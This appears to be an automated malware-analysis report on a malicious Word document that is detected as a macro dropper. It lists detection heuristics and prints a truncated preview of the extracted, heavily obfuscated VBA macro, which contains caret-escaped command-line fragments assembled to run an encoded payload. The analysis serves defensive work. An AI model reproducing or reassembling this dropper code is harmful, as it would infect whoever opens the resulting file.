MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, a critical indicator of malicious intent, suggesting it's designed to download and execute a secondary payload. The presence of the 'Doc.Dropper.Valyria-6665650-0' ClamAV signature further supports its classification as a dropper.
Heuristics 7
-
ClamAV: Doc.Dropper.Valyria-6665650-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Valyria-6665650-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12002 bytes |
SHA-256: 4ee5cff1227b54e1138c07da3db83c9ecedfe20f4612e071a4a68ee2e8b17500 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GftfQPiRZId" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "TVvHWaP" Function lWQDZBw() On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next Error 50074 / THdOU cBOQwUzJYk = "MD /v" + "^:^o /" + "c " + Chr(5 + 2 + 1 + 5 + 21) + " " + "^S^" + "et " + "^ ^ 6" + "^8" + "^FE=^A^" Error 5601 / wtdJk Error 50019 * 88335 / 14501 / DzdDOo Error 43819 * 70449 / 73934 / wuEtMS Error wHETpL / uvmEXG / bGAjIq * vuGKwo Error 5990 / HdkjP ZspWEST = "AC" + "A^g^" + "AA^" + "IA^" + "ACA^gA^" + "A" Error zJsXw * BiaTJ / YrLuF * URJav WqzPtVZtH = "^IA" + "A" + "CA^g^" + "AAI^AAC" + "A^g" + "^AA^I^A" + "^AC^" + "A^" + "gAAI" + "^A^ACA" + "gA^" + "Q^f^A" + "^0H" Error bAiUTm / qRfwja Error 53343 / Fviku DHzYNHfafcq = "^A^" + "7" + "^BA^a" + "^A^" + "MG" + "A0^BQ^Y" + "^" + "A^M^G" Error jqDUzd / kVTuQ / wsntR / uHvaF Error 67722 / SqjDX Error lSsAAG * Wqiajz Error IuLjBl * aJtzCO * 11284 * iXhFqw LbXBcupTs = "A" + "9^BwOA^" + "sG^" + "A" + "^hB^Q^Z" Error FmJIo / JljOVn * 18872 * WfQpdD Error 75136 / zqYdA Error 91055 * OlijlP Error DVGYo * Jlanz * qCGJZX / zIziwQ Error kdJiP * 92990 / XmzHp * iVKNV EozqB = "^A^I" + "H^A^iB" + "^w^O^A^" + "8^G^Am^" + "B^QRAQC" + "^A^g^A" + "Q^b" + "AU" + "G" Error 2243 / lnToXb * 38409 / THptXs Error zJJbVi * KIBUFz Error 17363 / qKwfDn / 13460 / 6079 piWjEMPM = "^A^" + "0^B^Q" + "S^A" + "0CA^" + "l^B^w" + "^aA8G^A" Error 15047 * pmmPE Error pmYLPw * PklYXp wlNJwWGsvIk = "2^Bg" + "bAk" + "E^A^7^" + "AQK^A^8" + "^GA^m^" Error 67093 * ibzjYu * 33525 * JBvZRQ Error JCOiz * kTNhq Error hiNRCM / KPYAFJ / nafLH / PYmip IDqaobhc = "BQR^" + "A^QC^A" + "gAA^L^A" + "YGA^" + "U^" + "B^" + "g^e^" lWQDZBw = cBOQwUzJYk + ZspWEST + WqzPtVZtH + DHzYNHfafcq + LbXBcupTs + EozqB + piWjEMPM + wlNJwWGsvIk + IDqaobhc Error 40127 / 88680 * 10948 / GiJsj Error QZHmji / 83677 Error 24710 * auUBPA * URaRu * QAuLiC Error UUXpdj * tHbGO Error SjpLuh * TkotzZ End Function Function rcEqw() On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next On _ Error _ Resume _ Next Error HVZss * HjPVWG Error lqDTD * 26442 Error mOjUSq / BGzwp / 57658 / EIoUJ Error DAUtE / 47577 waATqiB = "AQCA^o" + "^AQ" + "^Z" + "^" + "Aw^" + "GAp^BgR" + "AQG" + "^A^" + "h^B^wb" + "^A^" Error BUrdbi / KBITaE * bujioZ * tOjbYi Error KPTtk / kJYnA Error zYiitG / 53884 Error JtsTGX / WHPUl cSETwHw = "wG^A" + "^u^Bw^" + "d^A^" + "8G" + "^A" + "^E^" + "B^g^L^" + "A" Error 36140 / 37581 Error 400 / FSvPO Error KCCzQ / 55560 * OaHwQG * 46108 Error 91359 * ERIfzO ORSWkWjtfJ = "YE^A^D^" + "BgV^A^" + "QC" + "^" + "A^" + "7B^Qe^" Error 89953 / 39394 / MhFTNO * CtuXCB Error 77267 / SKpST Error 24780 / UPUvo Error tVpCBs * XFwSf / Idwkd / kSPlF Error 56235 * SWrTE TQzZoNMZU = "A" + "IH^" + "A^" + "0Bwe" + "A^kC^" + "AyB^g^U" + "A8^" + "GA^k^A" + "^A^IA4" Error 99762 / jGKasK Error VujOtQ / mYjuYi * 69486 * WMjtMQ imJHjzHHrCh = "^G" + "A^pB^" + "AI^AYG" + "^A^UB^" + "g^" + "eA^" + "QC^" + "A" + "^o^" + "AA" Error mVGXGw / 68337 / unfnGW / OVKQOU Error 15659 * PLzZR / NCujp / 8596 Error nOrzN / 71393 * 31515 * iiboW TwHoloMnl = "a" + "^A^MGA" + "h" + "^BQ" + "^Z^A" + "I^" Error 17832 * NzTIP / 98229 * EdhAE Error KjaQJu * wqIjNf Error 66414 / 44660 IvMMtlCXB = "H^Av" + "^" + "B^g^" + "Z^" + "AsD" rcEqw = waATqiB + cSETwHw + ORSWkWjtfJ + TQzZoNMZU + imJHjzHHrCh + TwHoloMnl + IvMMtlCXB Error 24933 / ZkhOKJ Error 61447 / iuIOs * 69123 * IEFCar Error buaRHl / izhaU / iaYUq / zbHJi End Function Function XmwKUJnQi() On _ Error _ Resume _ ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.